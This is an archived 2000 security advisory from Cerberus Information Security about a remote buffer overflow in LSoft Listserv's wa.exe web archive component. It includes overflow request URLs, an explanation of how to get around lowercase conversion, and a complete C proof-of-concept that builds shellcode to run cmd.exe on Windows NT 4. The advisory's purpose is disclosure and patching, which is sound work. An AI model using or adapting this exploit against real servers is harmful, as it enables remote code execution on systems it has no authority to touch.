TUCoPS :: Web :: General :: listserv.txt

LSoft Listserv Web Archive Component Remotely Exploitable Buffer Overrun


Cerberus Information Security Advisory (CISADV000503)
http://www.cerberus-infosec.co.uk/advisories.shtml

Released               : 3rd May 2000
Name                   : Listserv Web Archives Buffer Overflow
Affected Systems : *nix/Win32 Web Servers running
Issue                   : Attackers can remotely execute arbitrary code
Author                  : David Litchfield (mnemonix@globalnet.co.uk)

Description
***********
The Cerberus Security Team has found a remotely exploitable buffer overrun
in Lsoft's (www.lsoft.com) Listserv Web Archive component (wa/wa.exe v1.8d -
this is the most recent version. Earlier versions may be affected.).
Listserv is the world's most popular software package for providing mailing
lists. The Web Archives component allows List owners to make available over
the web mails that have been sent to the mailing list. Both the the Windows
and Unix versions are affected by this overflow. By making a special formed
request to the Web Archive component it is possible to overflow a buffer
allowing arbitrary code to be executed, compromising the web server.


Details
*******
This section specifically looks at the overrun on Windows NT 4 SP6a though
the principle is same on the *nix versions.

As far as exploiting this overrun is concerned there are two hurdles to
overcome. Firstly, the string is tolower()ed - meaning that upper case
letters are converted to lower case eg A -> a. This is a problem because
some opcodes needed in any exploit code will squashed. For example the "push
ebp" instruction is 55h - which is also the hex code for the uppercase
letter "U". Due to the tolower()ing this will be converted to 75h - making
it no longer the "push ebp" instruction.

The second problem is that when the buffer is overflowed, overwriting the
saved return address, before the ret(urn) is called a simple read access
violation occurs:

"The instruction at address 0x00427FC3 tried to read memory at 0x61616161"

This happens because one of the instructions called before the ret(urn) is

mov edi,dword ptr[ebp-14h]

This tells the processor to move into the EDI register the address pointed
to by the stack base pointer (EBP) minus 20 bytes. Due to the overflow, the
value found at this address is now 0x61616161 (Remember, even though we've
used upper case As to overflow the buffer they're converted to the lowercase
"a" hence instead of there being 0x41414141 at this address it is
0x61616161)

A few instructions after this has been moved into the EDI there is

cmp byte ptr[edi],0

This will compare the value pointed to by the EDI register with 0. As the
address in the EDI is 0x61616161 the processor goes to that address to get
the value stored there to compare it with 0 but when it gets there it finds
that the memory here has not been initialised. Hence the access violation.

http://charon/scripts/wa.exe?A1=foobar&L=AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA


To workaround this problem we have to insert into overflow string an address
where the memory _is_ intialized - that is where a value can be found at
that address. We know kernel32.dll _will_ be loaded into the address space
of the process (it always is in any process on NT) so for safety's sake
we'll insert into the overflow string an address smack bang in the middle of
kernel32.dll.

This way when the

mov edi,dword ptr[ebp-14h]
..
cmp byte ptr[edi],0

instructions are called we won't get the access violation. After a bit of
trial and error we find that we need to set bytes 392,391,390 and 389 in our
overflow string to an address where kernel32.dll is loaded. We'll get away
with only having to set the more significant part of the address - ie bytes
392 and 391 so we set these to %77 and %f3.

When we have done this we try the overflow string again.

http://charon/scripts/wa.exe?A1=foobar&L=AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA%f3%77AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA

Bang! We now get the overflow we've been looking for:

The instruction at 0x61616161 referenced memory at 0x61616161. This means
we've gained control of the program's execution and we can direct it to
where we want it to go to find the next instruction to execute. At this
stage there's still a fairly long to go and there's no guarantee we will be
able to exploit this due to the tolower()ing.

First off we need find out what we have to work with. On debugging after the
overflow we can see that the tail end of our overflow string can be found at
the stack pointer - the ESP. So all we need to do is find an address in
memory we there's a "jmp esp" or "call esp" instruction. This way if we
overwrite the saved return address with such an address where we can find
one of these instructions the processor will jump down to the ESP and start
executing downwards from there.

As you'll see though the tail of our exploit string is the tolower()ed
version. We'll need to find if there is any occurence of our overflow string
in memory that hasn't gone through the tolower()ing process. None of the
registers point to anything useful so doing a manual search we eventually
find our pristine string at address 0x00205370.

If we can get back to this address somehow we'll be able to get a decent
working exploit out of this. The easiest way to get there is to jump to it.

What we could do then is write and embed a wee bit of code in the overflow
string that ends up at the ESP which will jump us to address 0x00205370
where we'll place our main bit of code making giving our overflow string the
following format:

main-code-goeshere-padding-readableaddress-padding-code-that'll-jump-us-to-t
he-beginning-of-this-string

The only problem is this bit of code that'll jump us to where we really want
to go to cannot have any byte that'll be tolower()ed and on top of this the
address we need to get back to has a NULL in it.

As far as the NULL is concerned, this is easily resolved - we only have to
subtract a number A by a number B to give us 0x00205370 eg:

0xFFFFFFFF - 0xFFDFAC8F = 0x00205370

We can mov 0xFFFFFFFF into a register and simply sub(tract) from it
0xFFDFAC8F and be left with the address we need to jump to.


mov edi, 0xFFFFFFFF
sub edi, 0xFFDFAC8F
jmp edi

This is the code we need - but is there any character that will be
tolower()ed?

ba ff ff ff ff
81 ea 87 ac df ff
ff e2

Looking at the byte info of the opcodes we can see that none of them will be
tolower()ed. Cool. So now we've managed to get back to the beginning our
unadulterated overflow string. It is here we'll place our main bit of
exploit code. The sample code here is "proof of concept" only and will
simply create a file called "cerberus.txt". More useful code is left as
excercise of the imagination of the reader.



/////////////////////////////////////////////////////////////////
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield (mnemonix@globalnet.co.uk)
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include <stdio.h>
int main()
{
 unsigned char exploit[2000]="";
 int count = 0;

 while(count <100)
  {
   exploit[count]=0x90;
   count ++;
  }

 // push ebp
 exploit[count]=0x55;
 count ++;

 // mov ebp,esp
 exploit[count]=0x8B;
 count ++;
 exploit[count]=0xEC;
 count ++;

 // mov eax, 0x77f1a986
 exploit[count]=0xb8;
 count ++;
 exploit[count]=0x86;
 count ++;
 exploit[count]=0xa9;
 count ++;
 exploit[count]=0xf1;
 count ++;
 exploit[count]=0x77;
 count ++;

 // mov ebx, 0xffffffff
 exploit[count]=0xbb;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;

 file://sub ebx, 0xffffff8B
 exploit[count]=0x83;
 count ++;
 exploit[count]=0xeb;
 count ++;
 exploit[count]=0x8B;
 count ++;

 // push ebx
 exploit[count]=0x53;
 count ++;

 // push "xt.s"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x73;
 count ++;
 exploit[count]=0x2e;
 count ++;
 exploit[count]=0x74;
 count ++;
 exploit[count]=0x78;
 count ++;

 file://push "ureb"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x62;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x75;
 count ++;

 file://push "rec "
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;

 file://push "> ri"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x69;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x3e;
 count ++;

 file://push "d c/"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x2f;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x64;
 count ++;

 file://push " exe"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x78;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x20;
 count ++;


 file://push "cmd."
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x6d;
 count ++;
 exploit[count]=0x64;
 count ++;
 exploit[count]=0x2e;
 count ++;

 file://mov ebx, esp
 exploit[count]=0x8b;
 count ++;
 exploit[count]=0xdc;
 count ++;

 file://xor esi, esi
 exploit[count]=0x33;
 count ++;
 exploit[count]=0xf6;
 count ++;

 file://push esi
 exploit[count]=0x56;
 count ++;

 file://push ebx
 exploit[count]=0x53;
 count ++;

 file://call eax
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xd0;
 count ++;

 // set a break point (int 3)
 while(count <420)
  {
   exploit[count]=0xCC;
   count ++;
  }


 // overwrite the return address

 exploit[count]=0x36;
 count ++;
 exploit[count]=0x28;
 count ++;
 exploit[count]=0xf3;
 count ++;
 exploit[count]=0x77;
 count ++;

 // put in 40 nops (0x90)

 while (count < 464)
  {
   exploit[count]=0x90;
   count ++;
  }

 // write our code that'll get us back into our un-tolower()ed string

 // move edx, 0xFFFFFFFF
 exploit[count]=0xBA;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // sub edx, 0xFFDFAC87
 exploit[count]=0x81;
 count ++;
 exploit[count]=0xEA;
 count ++;
 exploit[count]=0x87;
 count ++;
 exploit[count]=0xAC;
 count ++;
 exploit[count]=0xDF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // jmp edx
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xE2;
 count ++;

 // set readable part in memory to stop first AV

 exploit[390]=0x36;
 exploit[390]=0xf3;
 exploit[391]=0x77;

 count = 0;
 while(count < 477)
  {
   printf("%%%x",exploit[count]);
   count ++;
  }

 return 0;
}



Solution
********
Lsoft has alerted their customers and have made avaiable a update that will
fix this.

A check for this has been added to  our security scanner, CIS. More details
about CIS can be found on our web site:
http://www.cerberus-infosec.co.uk/

Vendor Status
*************
Lsoft were alerted to this on the the 28th April 2000 and worked over the
holiday to fix this. Cerberus would like to thank everyone involved for
their prompt response.

About Cerberus Information Security, Ltd
*****************************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilites leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 70 to date, making them a clear leader of companies offering
such security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serves customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0)208 395 4980.

Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH